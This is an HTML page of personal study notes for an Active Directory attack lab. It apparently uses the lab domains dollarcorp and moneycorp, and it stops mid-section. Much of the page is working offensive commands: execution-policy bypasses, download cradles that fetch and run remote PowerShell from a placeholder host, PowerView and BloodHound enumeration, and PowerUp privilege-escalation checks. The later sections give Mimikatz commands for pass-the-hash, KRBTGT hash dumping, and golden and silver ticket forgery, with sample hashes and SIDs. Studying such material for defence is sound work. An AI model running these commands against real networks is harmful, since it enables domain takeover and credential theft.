<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AD-Notes-Chriag</title>
</head><body>&nbsp; &nbsp;Active Directory enables centralized secure management of an entire network. Everything stored in active directory is an object.<br/>
<br/>
##Active Directory - Components<br/>
<ul><li>Schema - Defines objects and their attributes (Windows User, Servers etc).</li>
<li>Query and Index mechanism - Provides searching and publication of objects and their properties.</li>
<li>Global Catalog - Contains information about every object in the directory.</li>
<li>Replication Service - Distributes information across domain controllers.</li>
</ul>
<br/>
<br/>
##Active Directory - Structure<br/>
Forest, domains and organization units(OUs) are the basic building blocks of any active directory structure.<br/>
Forest - A forest is the security boundary as per Microsoft may contain multiple domains and each domain may contain multiple OUs.<br/>
<br/>
##Powershell - Basics<br/>
Powershell scripts uses cmdlets, native commands, functions, .Net, DLLs, Windows API and much more in a single program(script).Powershell scripts are really powerfull and could do much stuff in less lines. Easy to write, easy syntax and easy to execute.<br/>
#Execution Policy<br/>
It is not a security measure, It is present to prevent user from accidently executing scripts.<br/>
There are several ways to bypass it <br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">powershell -ExecutionPolicy bypasspowershell -ep Bypass$env:PSExecutionPolicyPreference = "bypass"</span></span><br/>
<br/>
#Get-Help<br/>
Get-Help Get-Item -- Shows a brief help about the cmdlet or topic. Supports wildcard (*). Comes with various options and filters. Get-Help -? or help -? -- could be used to display help.Get-Help About_&lt;topic&gt; could be used to get help for conceptual topics<br/>
Get-Help * --Lists everything about the help topics.<br/>
Get-Help process --List everything which contains the word process.<br/>
Update-Help --Updates the help system (v3+)<br/>
Get-Help Get-Item -Full --List full help about a topic (Get-Item cmdlet in this case).<br/>
Get-Help Get-Item -Examples --Lists example of how to run a cmdlet (Get-Item cmdlet in this case).<br/>
<br/>
#What is cmdlets ?<br/>
Cmdlets are used to perform an action and a .Net object is returned as the output. Cmdlets accept parameters for different operations. They have aliases. There are NOT executables, you can write your own cmdlet with few lines of script. Get-Command -CommandType cmdlet -- This list all the cmdlets in the current powershell session<br/>
Get-Process --Lists processes running on the system.<br/>
<br/>
#Powershell Modules basic<br/>
Import-Module &lt;modulepath&gt;<br/>
Get-Command -Module &lt;modulename&gt; -- Get all the commands which is imported from the module<br/>
<br/>
##Download Cradles<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">iex (New-Object Net.WebClient).DownloadString('<a href="http://ip:port/file.ps1">http://ip:port/file.ps1</a>')</span></span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('<a href="http://ip:port/file.ps1%27%29%3B">http://ip:port/file.ps1');</a>sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response</span></span><br/>
#Powershell v3 onwards<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">iex(iwr '<a href="http://ip:port/file.ps1">http://ip:port/file.ps1</a>')</span></span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$h = New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET', '<a href="http://ip:port/file.ps1">http://ip:port/file.ps1</a>', $false);$h.send();iex $h.responseText</span></span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$wr = [<a href="http://System.Net.WebRequest">System.Net.WebRequest</a>]::Create("<a href="http://ip:port/file.ps1">http://ip:port/file.ps1</a>")$r = $wr.GetResponse()iex([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()</span></span><br/>
<br/>
##How to interact with active directory in lab<br/>
<ul><li>[ADSI]</li>
<li>.Net Classes (System.DirectoryServices.ActiveDirectory)</li>
<li>Native Executables</li>
<li>Powershell (.Net Classes &amp; WMI)</li>
</ul>
<br/>
<br/>
<span style="font-size: 24pt">Domain Enumeration</span><br/>
<span style="font-size: 10pt">Enumeration is most important during any engagement. </span>Command to find the current domain name using .Net Classes<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]$ADClass::GetCurrentDomain()</span></span><br/>
<span style="font-size: 10pt">Load PowerView</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">cd C:\AD\Tools. .\PowerView.ps1</span></span><br/>
Load AD Module<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">cd C:\AD\Tools\ADModule-master\Import-Module .\Microsoft.ActiveDirectory.Management.dllImport-Module .\ActiveDirectory\ActiveDirectory.psd1</span></span><br/>
Get Current Domain Information<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomain<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADDomain</span></span><br/>
<span style="font-size: 10pt">Get object of another domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomain -Domain moneycorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADDomain -Identity moneycorp.local</span></span><br/>
<span style="font-size: 10pt">Find Domain SID</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-DomainSID<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD Module(Get-ADDomain).DomainSID</span></span><br/>
<span style="font-size: 10pt">Get Domain policy for current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-DomainPolicy(Get-DomainPolicy)."system access" --Password Policy<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">(Get-DomainPolicy)."Kerberos Policy" --Kerberos Policy</span></span><br/>
<span style="font-size: 10pt">Get Domain policy from another domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">(Get-DomainPolicy -domain moneycorp.local)."system access"</span></span><br/>
<span style="font-size: 10pt">Get domain controller information for current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomainController<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADDomainController</span></span><br/>
<span style="font-size: 10pt">Get domain controller information for another domian</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomainController -Domain moneycorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADDomainController -DomainName moneycorp.local -Discover</span></span><br/>
<span style="font-size: 10pt">Get list of all users in the current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetUser<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Filter * -Properties *</span></span><br/>
<span style="font-size: 10pt">Get the details for specific user in the current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 10pt">#PowerViewGet-NetUser -Username student1</span><br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 10pt">#AD ModuleGet-ADUser -Identity student1 -Properties *</span></span></span><br/>
Get list of all properties for the users in the current domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-UserProperty<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property |  select Name</span></span><br/>
Get list of specific property for all users in the current domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-UserProperty -Properties pwdlastset<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Filter * -Properties * |  select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}</span></span><br/>
Search for a particular string in a user's attributes<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewFind-UserField -SearchField Description -SearchTerm "built"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description</span></span><br/>
<span style="font-size: 10pt">Get list of computers in the current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetComputer<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADComputer -Filter *</span></span><br/>
<span style="font-size: 10pt">Get all the not null properties for the computers</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetComputer -FullData<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADComputer -Filter * -Properties *</span></span><br/>
<span style="font-size: 10pt">Get list of computers running server 2016 computers</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetComputer -OperatingSystem "*Server 2016*"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADComputer -Filter 'OperatingSystem -like "*Server 2016*" -Properties OperatingSystem | select Name,OperatingSystem</span></span><br/>
<span style="font-size: 10pt">Check if the computers are alive. This will ping the computers in the network. Possibilities of false positive if ping is block in the network crossing firewalls.</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetComputer -Ping<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}</span></span><br/>
<span style="font-size: 10pt">Get information about the Groups from current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroup<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroup -Filter *</span></span><br/>
<span style="font-size: 10pt">Get information about the Groups from another domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroup -Domain moneycorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroup -Filter * -Server moneycorp.local</span></span><br/>
<span style="font-size: 10pt">Get full information about the Group from the current domain</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroup 'Domain Admins' -FullData<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroup -Filter * -Properties</span></span><br/>
<span style="font-size: 10pt">Get information about the Group using wildcard search</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroup -GroupName *admin*<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroup -Filter 'Name -like "*admin*"' | select name</span></span><br/>
<span style="font-size: 10pt">Get the member list from the groups</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroupMember -GroupName "Domain Admins" -Recurse<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroupMember -Identity "Domain Admins" -Recursive</span></span><br/>
<span style="font-size: 10pt">Get group membership for a user</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroup -UserName "student1"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADPrincipalGroupMembership -Identity student1</span></span><br/>
<span style="font-size: 10pt">Get list of all the local groups on a machine (needs administrator privileges on non dc machine)</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups</span></span><br/>
<span style="font-size: 10pt">Get members of all the local groups on a machine (needs administrator privileges on non dc machine)</span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse</span></span><br/>
Get actively logged users on a computer (need local admin rights on the target)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetLoggedon -ComputerName &lt;servername&gt;</span></span><br/>
Get locally logged users on a computer (needs remote registry on the target -started by-default on server os)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-LoggedonLocal -Computer dcorp-dc.dollarcorp.moneycorp.local</span></span><br/>
Get the last logged user on a computer (needs administrative rights and remote registry on the target)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-LastLoggedOn -ComputerName &lt;servername&gt;</span></span><br/>
Find shares on hosts in the current domain which are readable<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-ShareFinder -Verbose</span></span><br/>
Find shares on hosts in the current domain which are readable excluding default shares<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC</span></span><br/>
Find sensitive files on computers in the domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-FileFinder -Verbose</span></span><br/>
Get all file servers of the domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetFileServer</span></span><br/>
##What is Group Policy ?<br/>
Group Policy provides the ability to manage configuration and changes easily &amp; centrally in AD<br/>
Allows Configuration of - <ul><li>Security Settings</li>
<li>Registry-based policy settings</li>
<li>Group policy preferences like startup/shutdown/log-on/logoff scripts settings</li>
<li>Software Installation</li>
</ul>
<br/>
GPO can be abused for various attacks like privilege escalation, backdoors, persistence etc.<br/>
Find all the group policy in the current domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGPO</span></span><br/>
Find all the group policy display name<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGPO | select displayname</span></span><br/>
Find the group policy applied on the student machine<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGPO -ComputerName dcorp-stdadmin.dollarcorp.moneycorp.local</span></span><br/>
Get users which are in a local group of a machine using GPO<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewFind-GPOComputerAdmin -ComputerName dcorp-stdadmin.dollarcorp.moneycorp.local</span></span><br/>
Get machines where the given user is member of a specific group<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewFind-GPOLocation -UserName student1 -Verbose</span></span><br/>
Get OUs from the current domain<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetOU -FullData</span></span><br/>
## Access Control Model<br/>
Enables control on the ability of a process to access objects and other resources in active directory based on:<ul><li>Access Tokens (security context of a process - identity and privileges of user)</li>
<li>Security Descriptors (SID of the owner, Discretionary ACL (DACL) and System ACL (SACL))</li>
</ul>
<br/>
Every object in active directory has 3 things in active directory<ul><li>SACL</li>
<li>DACL</li>
<li>Owner</li>
</ul>
DACL &amp; SACL are made of Access Control Entries (ACE)<br/>
<br/>
#Access Control List (ACL)<br/>
It is a list of Access Control Entries (ACE) - ACE corresponds to individual permission or audits access. Who has permission and what can be done on an object ?<br/>
There are 2 types of ACLs<ul><li>DACL - Defines the permissions trustees(a user or group) have on an object.</li>
<li>SACL - Logs success and failure audit messages when an object is accessed.</li>
</ul>
<br/>
<br/>
#Enumerate ACLs<br/>
Get the ACLs associated with the specified object<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-ObjectAcl -SamAccountName student1 -ResolveGUIDs</span></span><br/>
Get the ACLs associated with the specified prefix to be used for search<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#PowerView</span>Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose<br/>
</span></span><span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#AD Module(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access</span></span></span><br/>
Get the ACLs associated with the specified LDAP path to be used for search<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-ObjectAcl -ADSpath "<a href="LDAP://CN=Domain">LDAP://CN=Domain</a>&nbsp;Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose</span></span><br/>
Search for interesting ACEs<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-ACLScanner -ResolveGUIDs</span></span><br/>
Get the ACLs associated with the specified path<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"</span></span><br/>
<br/>
##Domain Trust<br/>
In an AD environment, trust is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest.Trust can be automatic (parent-child, same forest etc). or established (forest, external).Trusted Domain Objects (TDOs) represent the trust relationships in a domain.<br/>
##Trust Properties<br/>
There are 2 properties of trust<ul><li>Trust Direction</li>
<li>Trust Transitivity</li>
</ul>
<br/>
#Trust Direction<br/>
<ul><li>One-Way Trust - Unidirectional. Users in the trusted domain can access resources in the trusting domain but the reverse is not true.</li>
<li>Two-Way Trust - Bi-directional. Users of both domain can access resources in the other domain.</li>
</ul>
<br/>
<br/>
#Trust Transitivity<br/>
<ul><li>Transitive - Can be extended to establish trust relationships with other domains. All the default intra-forest trust relationships (Tree-root, Parent-Child) between domains within a same are transitive two-way trusts.</li>
<li>Non Transitive - Cannot be extended to other domains in the forest. Can be two-way or one-way. This is the default trust (called external trust) between two domains in different forests when forests do not have a trust relationship.</li>
</ul>
<br/>
##Types of Trust<br/>
#Default / Automatic Trusts<br/>
Parent-Child trust - It is created automatically between the new domain and the domain that precedes it in the namespace hierarchy, whenever a new domain is added in a tree. For example, dollarcorp.moneycorp.local is a child of moneycorp.local. This trust is always two-way transitive.<br/>
Tree-Root trust - It is created automatically between whenever a new domain tree is added to a forest root. This trust is always two-way transitive.<br/>
<br/>
#Shortcut Trusts<br/>
Used to reduce access time in complex trust scenarios. Can be one-way or two-way transitive trust<br/>
<br/>
#External Trust<br/>
Between two domains in different forests when forests do not have a trust relationship. Can be one-way or two-way non transitive trust. <br/>
<br/>
#Forest Trust<br/>
It is created between forest root domain. Cannot be extended to a third forest (no implicit trust). Can be one-way or two-way and transitive or non transitive trust.<br/>
<br/>
##Domain Trust Mapping<br/>
Get a list of all domain trusts for the current domain <br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomainTrust<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">#AD ModuleGet-ADTrust</span></span></span><br/>
Get a list of all domain trusts for another domain <br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetDomainTrust -Domain us.dollarcorp.moneycorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADTrust -Identity us.dollarcorp.moneycorp.local</span></span><br/>
Get details about the current forest<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetForest<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADForest</span></span><br/>
Get details about the other forest<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetForest -Forest eurocorp.local<br/>
#AD Module<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Get-ADForest -Identity eurocorp.local</span></span><br/>
Get all domains in the current forest<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#PowerViewGet-NetForestDomain</span><br/>
</span></span><span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#AD Module(Get-ADForest).Domains</span></span></span><br/>
Get all domains for another forest<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetForestDomain -Forest eurocorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">#AD Module(Get-ADForest -Identity eurocorp.local).Domains</span></span></span><br/>
Get all global catalogs for the current forest<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetForestCatalog<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">#AD ModuleGet-ADForest  | select -ExpandProperty GlobalCatalogs</span></span></span><br/>
Get all global catalogs for another forest<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetForestCatalog -Forest eurocorp.local<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">#AD ModuleGet-ADForest -Identity eurocorp.local  | select -ExpandProperty GlobalCatalogs</span></span></span><br/>
Get details about the forest trust<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#PowerViewGet-NetForestTrust</span><br/>
</span></span><span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#AD ModuleGet-ADTrust - Filter 'msDS-TrustForestTrustInfo -ne "$null"'</span></span></span><br/>
<br/>
##User Hunting<br/>
Find all machines on the current domain where the current user has local admin access<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewFind-LocalAdminAccess -verbose</span></span><br/>
This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then use multi-threaded and check local admin access on each machine<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-CheckLocalAdminAccess</span></span><br/>
Use WMI to find if current user has local admin access on any computers in the domain<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#To load WMI script</span>. .\Find-WMILocalAdminAccess.ps1<br/>
<br/>
</span></span><br/>
Find local admins on all machines of the domain (needs administrator privileges on non-dc machines<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-EnumerateLocalAdmin -Verbose</span></span><br/>
This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then use multi-threaded script on each machine.<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-NetLocalGroup</span></span><br/>
Find computers where a domain admin (or specified user/group) has sessions:<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-UserHunter<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-UserHunter -GroupName "RDPUsers"</span></span><br/>
This functions queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using (Get-NetGroupMember), gets a list of computers (Get-NetComputer) and list sessions and logged on users from each machine.<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetSession<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetLoggedon</span></span><br/>
To confirm admin access<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-UserHunter -CheckAccess</span></span><br/>
This option queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using (Get-NetGroupMember), get a list of only high traffic server (DC, File Servers &amp; Distributed File Servers) for less traffic generation and list sessions and logged on users (Get-NetSession / Get-NetLoggedon) from each machine<br/>
Find computers where a domain admin is logged-in<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewInvoke-UserHunter -Stealth</span></span><br/>
 ##Local Privilege Escalation <br/>
In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look at the following <ul><li>Hunting for Local Admin access on other machines </li>
<li>Hunting for high privilege domain accounts (like a Domain Administrator)</li>
</ul>
<br/>
There are various ways of locally escalating privileges on Windows box: <ul><li>Missing patches</li>
<li>Automated deployment and AutoLogon passwords in clear text</li>
<li>AlwaysInstallElevated (Any user can run MSI as SYSTEM)</li>
<li>Misconfigured Services</li>
<li>DLL Hijacking and more </li>
</ul>
<br/>
We can use below tools for complete coverage<ul><li>PowerUp: <a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</a></li>
<li>BeRoot: <a href="https://github.com/AlessandroZ/BeRoot">https://github.com/AlessandroZ/BeRoot</a></li>
<li>Privesc: <a href="https://github.com/enjoiz/Privesc">https://github.com/enjoiz/Privesc</a></li>
</ul>
<br/>
<br/>
#Identify  services Issues using PowerUp<br/>
Get services with unquoted paths and a space in their name<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerUpGet-ServiceUnquoted -Verbose</span></span><br/>
Get services where the current user can write to its binary path or change arguments to the binary<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerUpGet-ModifiableServiceFile -Verbose</span></span><br/>
Get the services whose configuration current user can modify<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerUpGet-ModifiableService -Verbose</span></span><br/>
List the bin path of all the services using WMI<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-WmiObject -Class win32_service | select pathname</span></span><br/>
Run all checks for privilege escalation<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerUpInvoke-AllChecks<br/>
#BeRoot.\beRoot.exe<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#PrivescInvoke-PrivEsc</span></span><br/>
<br/>
##Enumerating Domain using BloodHound<br/>
What is BloodHound ?<br/>
Provides GUI for AD entities and relationships for the data collected by its ingestors. Uses Graph Theory for providing the capability of mapping shortest path for interesting things like Domain Admins. There are built-in queries for frequently used actions. Also supports custom Cypher queries. <br/>
BloodHound has 2 parts<br/>
<ul><li>Ingester - This is used to collect the data from the environment. SharpHound is the ingester for bloodhound data collection.</li>
<li>GUI - This is used to uploaded the collected data and view the relationships in GUI Mode.</li>
</ul>
<br/>
Collect data using SharpHound<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#Load Sharphound powershell script. .\Sharphound.ps1<br/>
#Collect all data from the environmentInvoke-BloodHound -CollectionMethod All -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#Collect session data from the environmentInvoke-BloodHound -CollectionMethod LoggedOn -Verbose</span></span><br/>
<br/>
##Lateral Movement<br/>
<br/>
PSRemoting - It's administrative utility which allows system administrator to manage the system. It uses 5985.5986 port. It can help you to get elevated shell on the target system. It requires admin privilege on the target system.<br/>
There are 2 types of PSRemoting<br/>
One-to-One<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local</span></span><br/>
One-to-Many<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}<br/>
Invoke-Command -ScriptBlock {whoami} -ComputerName (Get-Content C:\AD\Tools\comp.txt)<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath C:\AD\Tools\PowerUp.ps1  </span></span><br/>
Over-Pass-The hash<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:a98e18228819e8eec3dfa33cb68b0728 /run:powershell.exe"'</span></span><br/>
<br/>
## Domain Persistence<br/>
Kerberos is the basis of authentication in a windows active directory environment. It has been constantly attacked since it was implemented with new attacks and scrutiny every couple of years.<br/>
<ul><li>NTLM password hash for kerberos RC4 encryption.</li>
<li>Logon Ticket(TGT) provides user auth to DC.</li>
<li>Kerberos policy only checked when TGT is created.</li>
<li>DC validates user account only when TGT &gt; 20 mins.</li>
</ul>
<ul><li style="list-style-type: none"><ul><li>Service Tickets (TGS) PAC validation is optional &amp; rare</li>
<li>Server LSASS sends PAC validation request to DC's netlogon service (NRPC)</li>
<li>If it runs as a service, PAC validation is optional (disabled)</li>
<li>If a service runs as System, it performs server signature verification on the PAC (Computer Account long-term key).</li>
</ul>
</li>
</ul>
<br/>
<br/>
#Golden Ticket<br/>
A golden ticket is signed and encrypted by the hash of KRBTGT account which makes it a valid TGT ticket.Since user account validation is not done by Domain Controller (KDC service) until TGT is older than 20 minutes, we can use even deleted/ revoked accounts.The KTBTGT user has could be used to impersonate any user with any privileges from even a non-domain machine.Password change has no effect on this attack.<br/>
Execute mimikatz on DC as Domain Admin to get KRBTGT hash<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc</span></span><br/>
Create golden ticket for administrator account<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</span></span><br/>
WMI command to find the operating system details from the remote host<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local</span></span><br/>
<br/>
#Silver Ticket<br/>
A valid TGS (Golden Ticket is a valid TGT).Encrypted and Signed by the NTLM hash of the service account / computer account (Golden ticket is signed by hash of krbtgt) of the service running with that account.Services rarely check PAC (Privileged Attribute Certificate).Services will allow access only to the services themselves.Reasonable persistence period (default 30 days for computer accounts).<br/>
Using hash of the domain controller computer account, below command provides access to shares on the DC.<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:e214e73b73085c290421f085f6ed67bb /user:Administrator /ptt"'</span></span><br/>
Schedule the task<br/>
